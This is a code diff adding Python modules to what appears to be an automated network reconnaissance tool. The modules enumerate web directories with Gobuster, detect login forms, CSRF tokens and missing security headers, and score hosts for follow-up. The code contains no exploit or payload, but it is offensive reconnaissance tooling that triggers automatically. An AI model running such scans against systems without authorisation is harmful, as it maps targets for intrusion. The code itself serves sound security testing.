elif status == 401 and "digest" in www.lower():
auth_type = "digest"
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
missing_headers = []
for header in [
"x-frame-options",
"x-content-type-options",
"content-security-policy",
"referrer-policy",
]:
if header not in h:
missing_headers.append(header)
# HSTS is only relevant on HTTPS.
if "strict-transport-security" not in h:
missing_headers.append("strict-transport-security")
rate_limited_hint = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
# Very cheap "issue hints"
issues = []
for s in SQLI_ERRORS:
if s in snippet:
issues.append("sqli_error_hint")
break
for s in LFI_HINTS:
if s in snippet:
issues.append("lfi_hint")
break
for s in DEBUG_HINTS:
if s in snippet:
issues.append("debug_hint")
break
cookie_names = []
if set_cookie:
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"missing_security_headers": missing_headers[:12],
"rate_limited_hint": bool(rate_limited_hint),
"issues": issues[:8],
"cookie_names": cookie_names[:12],
"server": h.get("server", ""),
"x_powered_by": h.get("x-powered-by", ""),
}
class ValkyrieScout:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _fetch(
self,
*,
ip: str,
port: int,
scheme: str,
path: str,
timeout_s: float,
user_agent: str,
max_bytes: int,
) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
headers_out: Dict[str, str] = {}
status = 0
size = 0
body_snip = ""
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
chunk = resp.read(max_bytes)
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def _db_upsert(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
path: str,
status: int,
size: int,
response_ms: int,
content_type: str,
payload: dict,
user_agent: str,
):
try:
headers_json = json.dumps(payload, ensure_ascii=True)
except Exception:
headers_json = ""
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'valkyrie_scout', 'GET', ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
user_agent or "",
headers_json,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebScout/1.0"))
max_bytes = int(getattr(self.shared_data, "web_probe_max_bytes", 65536))
delay_s = float(getattr(self.shared_data, "valkyrie_delay_s", 0.05))
paths = getattr(self.shared_data, "valkyrie_scout_paths", None)
if not isinstance(paths, list) or not paths:
paths = DEFAULT_PATHS
# UI
self.shared_data.bjorn_orch_status = "ValkyrieScout"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
max_bytes=max_bytes,
)
# Only keep minimal info; do not store full HTML.
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
payload = {
"signals": signals,
"sample": {"status": int(status), "content_type": ctype, "rt_ms": int(elapsed_ms)},
}
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
payload=payload,
user_agent=user_agent,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"status": str(status),
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
if delay_s > 0:
time.sleep(delay_s)
progress.set_complete()
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ValkyrieScout (light web scout)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="80")
args = parser.parse_args()
sd = SharedData()
act = ValkyrieScout(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": ""}
print(act.execute(args.ip, args.port, row, "ValkyrieScout"))

424
actions/web_enum.py Normal file
View File

@@ -0,0 +1,424 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
- Writes each finding into the `webenum` table in REAL-TIME (Streaming).
- Updates bjorn_progress with actual percentage (0-100%).
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit) immediately.
- No filesystem output: parse Gobuster stdout/stderr directly.
- Filtrage dynamique des statuts HTTP via shared_data.web_status_codes.
"""
import re
import socket
import subprocess
import threading
import logging
import time
import os
import select
from typing import List, Dict, Tuple, Optional, Set
from shared import SharedData
from logger import Logger
# -------------------- Logger & module meta --------------------
logger = Logger(name="web_enum.py", level=logging.DEBUG)
b_class = "WebEnumeration"
b_module = "web_enum"
b_status = "WebEnumeration"
b_port = 80
b_service = '["http","https"]'
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
b_parent = None
b_priority = 9
b_cooldown = 1800
b_rate_limit = '3/86400'
b_enabled = 1
# -------------------- Defaults & parsing --------------------
DEFAULT_WEB_STATUS_CODES = [
200, 201, 202, 203, 204, 206,
301, 302, 303, 307, 308,
401, 403, 405,
"5xx",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
# Gobuster "dir" line examples handled:
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
GOBUSTER_LINE = re.compile(
r"""^(?P<path>\S+)\s*
\(Status:\s*(?P<status>\d{3})\)\s*
(?:\[Size:\s*(?P<size>\d+)\])?
(?:\s*\[\-\-\>\s*(?P<redir>[^\]]+)\])?
""",
re.VERBOSE
)
# Regex pour capturer la progression de Gobuster sur stderr
# Ex: "Progress: 1024 / 4096 (25.00%)"
GOBUSTER_PROGRESS_RE = re.compile(r"Progress:\s+(?P<current>\d+)\s*/\s+(?P<total>\d+)")
def _normalize_status_policy(policy) -> Set[int]:
"""
Transforme une politique "UI" en set d'entiers HTTP.
"""
codes: Set[int] = set()
if not policy:
policy = DEFAULT_WEB_STATUS_CODES
for item in policy:
try:
if isinstance(item, int):
if 100 <= item <= 599:
codes.add(item)
elif isinstance(item, str):
s = item.strip().lower()
if s.endswith("xx") and len(s) == 3 and s[0].isdigit():
base = int(s[0]) * 100
codes.update(range(base, base + 100))
elif "-" in s:
a, b = s.split("-", 1)
a, b = int(a), int(b)
a, b = max(100, a), min(599, b)
if a <= b:
codes.update(range(a, b + 1))
else:
v = int(s)
if 100 <= v <= 599:
codes.add(v)
except Exception:
logger.warning(f"Ignoring invalid status code token: {item!r}")
return codes
class WebEnumeration:
"""
Orchestrates Gobuster web dir enum and writes normalized results into DB.
Streaming mode: Reads stdout/stderr in real-time for DB inserts and Progress UI.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
self.wordlist = self.shared_data.common_wordlist
self.lock = threading.Lock()
# Cache pour la taille de la wordlist (pour le calcul du %)
self.wordlist_size = 0
self._count_wordlist_lines()
# ---- Sanity checks
self._available = True
if not os.path.exists(self.gobuster_path):
logger.error(f"Gobuster not found at {self.gobuster_path}")
self._available = False
if not os.path.exists(self.wordlist):
logger.error(f"Wordlist not found: {self.wordlist}")
self._available = False
# Politique venant de lUI : créer si absente
if not hasattr(self.shared_data, "web_status_codes") or not self.shared_data.web_status_codes:
self.shared_data.web_status_codes = DEFAULT_WEB_STATUS_CODES.copy()
logger.info(
f"WebEnumeration initialized (Streaming Mode). "
f"Wordlist lines: {self.wordlist_size}. "
f"Policy: {self.shared_data.web_status_codes}"
)
def _count_wordlist_lines(self):
"""Compte les lignes de la wordlist une seule fois pour calculer le %."""
if self.wordlist and os.path.exists(self.wordlist):
try:
# Lecture rapide bufferisée
with open(self.wordlist, 'rb') as f:
self.wordlist_size = sum(1 for _ in f)
except Exception as e:
logger.error(f"Error counting wordlist lines: {e}")
self.wordlist_size = 0
# -------------------- Utilities --------------------
def _scheme_for_port(self, port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _reverse_dns(self, ip: str) -> Optional[str]:
try:
name, _, _ = socket.gethostbyaddr(ip)
return name
except Exception:
return None
def _extract_identity(self, row: Dict) -> Tuple[str, Optional[str]]:
"""Return (mac_address, hostname) from a row with tolerant keys."""
mac = row.get("mac_address") or row.get("mac") or row.get("MAC") or ""
hostname = row.get("hostname") or row.get("Hostname") or None
return str(mac), (str(hostname) if hostname else None)
# -------------------- Filter helper --------------------
def _allowed_status_set(self) -> Set[int]:
"""Recalcule à chaque run pour refléter une mise à jour UI en live."""
try:
return _normalize_status_policy(getattr(self.shared_data, "web_status_codes", None))
except Exception as e:
logger.error(f"Failed to load shared_data.web_status_codes: {e}")
return _normalize_status_policy(DEFAULT_WEB_STATUS_CODES)
# -------------------- DB Writer --------------------
def _db_add_result(self,
mac_address: str,
ip: str,
hostname: Optional[str],
port: int,
directory: str,
status: int,
size: int = 0,
response_time: int = 0,
content_type: Optional[str] = None,
tool: str = "gobuster") -> None:
"""Upsert a single record into `webenum`."""
try:
self.shared_data.db.execute("""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
tool = COALESCE(excluded.tool, webenum.tool),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""", (mac_address, ip, hostname, int(port), directory, int(status),
int(size or 0), int(response_time or 0), content_type, tool))
logger.debug(f"DB upsert: {ip}:{port}{directory} -> {status} (size={size})")
except Exception as e:
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
# -------------------- Public API (Streaming Version) --------------------
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
"""
Run gobuster on (ip,port), STREAM stdout/stderr, upsert findings real-time.
Updates bjorn_progress with 0-100% completion.
Returns: 'success' | 'failed' | 'interrupted'
"""
if not self._available:
return 'failed'
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
scheme = self._scheme_for_port(port)
base_url = f"{scheme}://{ip}:{port}"
# Setup Initial UI
self.shared_data.comment_params = {"ip": ip, "port": str(port), "url": base_url}
self.shared_data.bjorn_orch_status = "WebEnumeration"
self.shared_data.bjorn_progress = "0%"
logger.info(f"Enumerating {base_url} (Stream Mode)...")
# Prepare Identity & Policy
mac_address, hostname = self._extract_identity(row)
if not hostname:
hostname = self._reverse_dns(ip)
allowed = self._allowed_status_set()
# Command Construction
# NOTE: Removed "--quiet" and "-z" to ensure we get Progress info on stderr
# But we use --no-color to make parsing easier
cmd = [
self.gobuster_path, "dir",
"-u", base_url,
"-w", self.wordlist,
"-t", "10", # Safe for RPi Zero
"--no-color",
"--no-progress=false", # Force progress bar even if redirected
]
process = None
findings_count = 0
stop_requested = False
# For progress calc
total_lines = self.wordlist_size if self.wordlist_size > 0 else 1
last_progress_update = 0
try:
# Merge stdout and stderr so we can read everything in one loop
process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True,
bufsize=1,
universal_newlines=True
)
# Use select() (on Linux) so we can react quickly to stop requests
# without blocking forever on readline().
while True:
if self.shared_data.orchestrator_should_exit:
stop_requested = True
break
if process.poll() is not None:
# Process exited; drain remaining buffered output if any
line = process.stdout.readline() if process.stdout else ""
if not line:
break
else:
line = ""
if process.stdout:
if os.name != "nt":
r, _, _ = select.select([process.stdout], [], [], 0.2)
if r:
line = process.stdout.readline()
else:
# Windows: select() doesn't work on pipes; best-effort read.
line = process.stdout.readline()
if not line:
continue
# 3. Clean Line
clean_line = ANSI_RE.sub("", line).strip()
clean_line = CTL_RE.sub("", clean_line).strip()
if not clean_line:
continue
# 4. Check for Progress
if "Progress:" in clean_line:
now = time.time()
# Update UI max every 0.5s to save CPU
if now - last_progress_update > 0.5:
m_prog = GOBUSTER_PROGRESS_RE.search(clean_line)
if m_prog:
curr = int(m_prog.group("current"))
# Calculate %
pct = (curr / total_lines) * 100
pct = min(pct, 100.0)
self.shared_data.bjorn_progress = f"{int(pct)}%"
last_progress_update = now
continue
# 5. Check for Findings (Standard Gobuster Line)
m_res = GOBUSTER_LINE.match(clean_line)
if m_res:
st = int(m_res.group("status"))
# Apply Filtering Logic BEFORE DB
if st in allowed:
path = m_res.group("path")
if not path.startswith("/"): path = "/" + path
size = int(m_res.group("size") or 0)
redir = m_res.group("redir")
# Insert into DB Immediately
self._db_add_result(
mac_address=mac_address,
ip=ip,
hostname=hostname,
port=port,
directory=path,
status=st,
size=size,
response_time=0,
content_type=None,
tool="gobuster"
)
findings_count += 1
# Live feedback in comments
self.shared_data.comment_params = {
"url": base_url,
"found": str(findings_count),
"last": path
}
continue
# (Optional) Log errors/unknown lines if needed
# if "error" in clean_line.lower(): logger.debug(f"Gobuster err: {clean_line}")
# End of loop
if stop_requested:
logger.info("Interrupted by orchestrator.")
return "interrupted"
self.shared_data.bjorn_progress = "100%"
return "success"
except Exception as e:
logger.error(f"Execute error on {base_url}: {e}")
if process:
try:
process.terminate()
except Exception:
pass
return "failed"
finally:
if process:
try:
if stop_requested and process.poll() is None:
process.terminate()
# Always reap the child to avoid zombies.
try:
process.wait(timeout=2)
except Exception:
try:
process.kill()
except Exception:
pass
try:
process.wait(timeout=2)
except Exception:
pass
finally:
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
except Exception as e:
logger.error(f"General execution error: {e}")
return "failed"
# -------------------- CLI mode (debug/manual) --------------------
if __name__ == "__main__":
shared_data = SharedData()
try:
web_enum = WebEnumeration(shared_data)
logger.info("Starting web directory enumeration (CLI)...")
rows = shared_data.read_data()
for row in rows:
ip = row.get("IPs") or row.get("ip")
if not ip:
continue
port = row.get("port") or 80
logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
status = web_enum.execute(ip, int(port), row, "enum_web_directories")
if status == "success":
logger.success(f"Enumeration successful for {ip}:{port}.")
elif status == "interrupted":
logger.warning(f"Enumeration interrupted for {ip}:{port}.")
break
else:
logger.failed(f"Enumeration failed for {ip}:{port}.")
logger.info("Web directory enumeration completed.")
except Exception as e:
logger.error(f"General execution error: {e}")

View File

@@ -0,0 +1,316 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_login_profiler.py — Lightweight web login profiler (Pi Zero friendly).
Goal:
- Profile web endpoints to detect login surfaces and defensive controls (no password guessing).
- Store findings into DB table `webenum` (tool='login_profiler') for community visibility.
- Update EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_login_profiler.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebLoginProfiler"
b_module = "web_login_profiler"
b_status = "WebLoginProfiler"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 55
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "6/86400"
b_enabled = 1
# Small curated list, cheap but high signal.
DEFAULT_PATHS = [
"/",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
"/robots.txt",
]
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = {str(k).lower(): str(v) for k, v in (headers or {}).items()}
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
elif status == 401 and "digest" in www.lower():
auth_type = "digest"
# Very cheap login form heuristics
snippet = (body_snippet or "").lower()
has_form = "<form" in snippet
has_password = "type=\"password\"" in snippet or "type='password'" in snippet
looks_like_login = bool(has_form and has_password) or any(x in snippet for x in ["login", "sign in", "connexion"])
csrf_markers = [
"csrfmiddlewaretoken",
"authenticity_token",
"csrf_token",
"name=\"_token\"",
"name='_token'",
]
has_csrf = any(m in snippet for m in csrf_markers)
# Rate limit / lockout hints
rate_limited = (status == 429) or ("retry-after" in h) or ("x-ratelimit-remaining" in h)
cookie_names = []
if set_cookie:
# Parse only cookie names cheaply
for part in set_cookie.split(","):
name = part.split(";", 1)[0].split("=", 1)[0].strip()
if name and name not in cookie_names:
cookie_names.append(name)
framework_hints = []
for cn in cookie_names:
l = cn.lower()
if l in {"csrftoken", "sessionid"}:
framework_hints.append("django")
elif l in {"laravel_session", "xsrf-token"}:
framework_hints.append("laravel")
elif l == "phpsessid":
framework_hints.append("php")
elif "wordpress" in l:
framework_hints.append("wordpress")
server = h.get("server", "")
powered = h.get("x-powered-by", "")
return {
"auth_type": auth_type,
"looks_like_login": bool(looks_like_login),
"has_csrf": bool(has_csrf),
"rate_limited_hint": bool(rate_limited),
"server": server,
"x_powered_by": powered,
"cookie_names": cookie_names[:12],
"framework_hints": sorted(set(framework_hints))[:6],
}
class WebLoginProfiler:
def __init__(self, shared_data):
self.shared_data = shared_data
self._ssl_ctx = ssl._create_unverified_context()
def _db_upsert(self, *, mac: str, ip: str, hostname: str, port: int, path: str,
status: int, size: int, response_ms: int, content_type: str,
method: str, user_agent: str, headers_json: str):
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'login_profiler', ?, ?, ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
user_agent = COALESCE(excluded.user_agent, webenum.user_agent),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
path or "/",
int(status),
int(size or 0),
int(response_ms or 0),
content_type or "",
method or "GET",
user_agent or "",
headers_json or "",
),
)
def _fetch(self, *, ip: str, port: int, scheme: str, path: str, timeout_s: float,
user_agent: str) -> Tuple[int, Dict[str, str], str, int, int]:
started = time.time()
body_snip = ""
headers_out: Dict[str, str] = {}
status = 0
size = 0
conn = None
try:
if scheme == "https":
conn = HTTPSConnection(ip, port=port, timeout=timeout_s, context=self._ssl_ctx)
else:
conn = HTTPConnection(ip, port=port, timeout=timeout_s)
conn.request("GET", path, headers={"User-Agent": user_agent, "Accept": "*/*"})
resp = conn.getresponse()
status = int(resp.status or 0)
for k, v in resp.getheaders():
if k and v:
headers_out[str(k)] = str(v)
# Read only a small chunk (Pi-friendly) for fingerprinting.
chunk = resp.read(65536) # 64KB
size = len(chunk or b"")
try:
body_snip = (chunk or b"").decode("utf-8", errors="ignore")
except Exception:
body_snip = ""
except (ConnectionError, TimeoutError, RemoteDisconnected):
status = 0
except Exception:
status = 0
finally:
try:
if conn:
conn.close()
except Exception:
pass
elapsed_ms = int((time.time() - started) * 1000)
return status, headers_out, body_snip, size, elapsed_ms
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else int(getattr(self, "port", 80) or 80)
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
hostname = _first_hostname_from_row(row)
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
timeout_s = float(getattr(self.shared_data, "web_probe_timeout_s", 4.0))
user_agent = str(getattr(self.shared_data, "web_probe_user_agent", "BjornWebProfiler/1.0"))
paths = getattr(self.shared_data, "web_login_profiler_paths", None) or DEFAULT_PATHS
if not isinstance(paths, list):
paths = DEFAULT_PATHS
self.shared_data.bjorn_orch_status = "WebLoginProfiler"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i)}
progress = ProgressTracker(self.shared_data, len(paths))
found_login = 0
try:
for p in paths:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
path = str(p or "/").strip()
if not path.startswith("/"):
path = "/" + path
status, headers, body, size, elapsed_ms = self._fetch(
ip=ip,
port=port_i,
scheme=scheme,
path=path,
timeout_s=timeout_s,
user_agent=user_agent,
)
ctype = headers.get("Content-Type") or headers.get("content-type") or ""
signals = _detect_signals(status, headers, body)
if signals.get("looks_like_login") or signals.get("auth_type"):
found_login += 1
headers_payload = {
"signals": signals,
"sample": {
"status": status,
"content_type": ctype,
},
}
try:
headers_json = json.dumps(headers_payload, ensure_ascii=True)
except Exception:
headers_json = ""
try:
self._db_upsert(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
path=path,
status=status or 0,
size=size,
response_ms=elapsed_ms,
content_type=ctype,
method="GET",
user_agent=user_agent,
headers_json=headers_json,
)
except Exception as e:
logger.error(f"DB write failed for {ip}:{port_i}{path}: {e}")
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": path,
"login": str(int(bool(signals.get("looks_like_login") or signals.get("auth_type")))),
}
progress.advance(1)
progress.set_complete()
# "success" means: profiler ran; not that a login exists.
logger.info(f"WebLoginProfiler done for {ip}:{port_i} (login_surfaces={found_login})")
return "success"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""

View File

@@ -0,0 +1,233 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
web_surface_mapper.py — Post-profiler web surface scoring (no exploitation).
Trigger idea: run after WebLoginProfiler to compute a summary and a "risk score"
from recent webenum rows written by tool='login_profiler'.
Writes one summary row into `webenum` (tool='surface_mapper') so it appears in UI.
Updates EPD UI fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import time
from typing import Any, Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="web_surface_mapper.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "WebSurfaceMapper"
b_module = "web_surface_mapper"
b_status = "WebSurfaceMapper"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_success:WebLoginProfiler"
b_priority = 45
b_action = "normal"
b_cooldown = 600
b_rate_limit = "48/86400"
b_enabled = 1
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _safe_json_loads(s: str) -> dict:
try:
return json.loads(s) if s else {}
except Exception:
return {}
def _score_signals(signals: dict) -> int:
"""
Heuristic risk score 0..100.
This is not an "attack recommendation"; it's a prioritization for recon.
"""
if not isinstance(signals, dict):
return 0
score = 0
auth = str(signals.get("auth_type") or "").lower()
if auth in {"basic", "digest"}:
score += 45
if bool(signals.get("looks_like_login")):
score += 35
if bool(signals.get("has_csrf")):
score += 10
if bool(signals.get("rate_limited_hint")):
# Defensive signal: reduces priority for noisy follow-ups.
score -= 25
hints = signals.get("framework_hints") or []
if isinstance(hints, list) and hints:
score += min(10, 3 * len(hints))
return max(0, min(100, int(score)))
class WebSurfaceMapper:
def __init__(self, shared_data):
self.shared_data = shared_data
def _db_upsert_summary(
self,
*,
mac: str,
ip: str,
hostname: str,
port: int,
scheme: str,
summary: dict,
):
directory = "/__surface_summary__"
payload = json.dumps(summary, ensure_ascii=True)
self.shared_data.db.execute(
"""
INSERT INTO webenum (
mac_address, ip, hostname, port, directory, status,
size, response_time, content_type, tool, method,
user_agent, headers, is_active
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, 'surface_mapper', 'SUMMARY', '', ?, 1)
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
status = excluded.status,
size = excluded.size,
response_time = excluded.response_time,
content_type = excluded.content_type,
hostname = COALESCE(excluded.hostname, webenum.hostname),
headers = COALESCE(excluded.headers, webenum.headers),
last_seen = CURRENT_TIMESTAMP,
is_active = 1
""",
(
mac or "",
ip or "",
hostname or "",
int(port),
directory,
200,
len(payload),
0,
"application/json",
payload,
),
)
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
try:
port_i = int(port) if str(port).strip() else 80
except Exception:
port_i = 80
scheme = _scheme_for_port(port_i)
self.shared_data.bjorn_orch_status = "WebSurfaceMapper"
self.shared_data.bjorn_status_text2 = f"{ip}:{port_i}"
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "phase": "score"}
# Load recent profiler rows for this target.
rows: List[Dict[str, Any]] = []
try:
rows = self.shared_data.db.query(
"""
SELECT directory, status, content_type, headers, response_time, last_seen
FROM webenum
WHERE mac_address=? AND ip=? AND port=? AND is_active=1 AND tool='login_profiler'
ORDER BY last_seen DESC
""",
(mac or "", ip, int(port_i)),
)
except Exception as e:
logger.error(f"DB query failed (webenum login_profiler): {e}")
rows = []
progress = ProgressTracker(self.shared_data, max(1, len(rows)))
scored: List[Tuple[int, str, int, str, dict]] = []
try:
for r in rows:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
directory = str(r.get("directory") or "/")
status = int(r.get("status") or 0)
ctype = str(r.get("content_type") or "")
h = _safe_json_loads(str(r.get("headers") or ""))
signals = h.get("signals") if isinstance(h, dict) else {}
score = _score_signals(signals if isinstance(signals, dict) else {})
scored.append((score, directory, status, ctype, signals if isinstance(signals, dict) else {}))
self.shared_data.comment_params = {
"ip": ip,
"port": str(port_i),
"path": directory,
"score": str(score),
}
progress.advance(1)
scored.sort(key=lambda t: (t[0], t[2]), reverse=True)
top = scored[:5]
avg = int(sum(s for s, *_ in scored) / max(1, len(scored))) if scored else 0
top_path = top[0][1] if top else ""
top_score = top[0][0] if top else 0
summary = {
"ip": ip,
"port": int(port_i),
"scheme": scheme,
"count_profiled": int(len(rows)),
"avg_score": int(avg),
"top": [
{"score": int(s), "path": p, "status": int(st), "content_type": ct, "signals": sig}
for (s, p, st, ct, sig) in top
],
"ts_epoch": int(time.time()),
}
try:
self._db_upsert_summary(
mac=mac,
ip=ip,
hostname=hostname,
port=port_i,
scheme=scheme,
summary=summary,
)
except Exception as e:
logger.error(f"DB upsert summary failed: {e}")
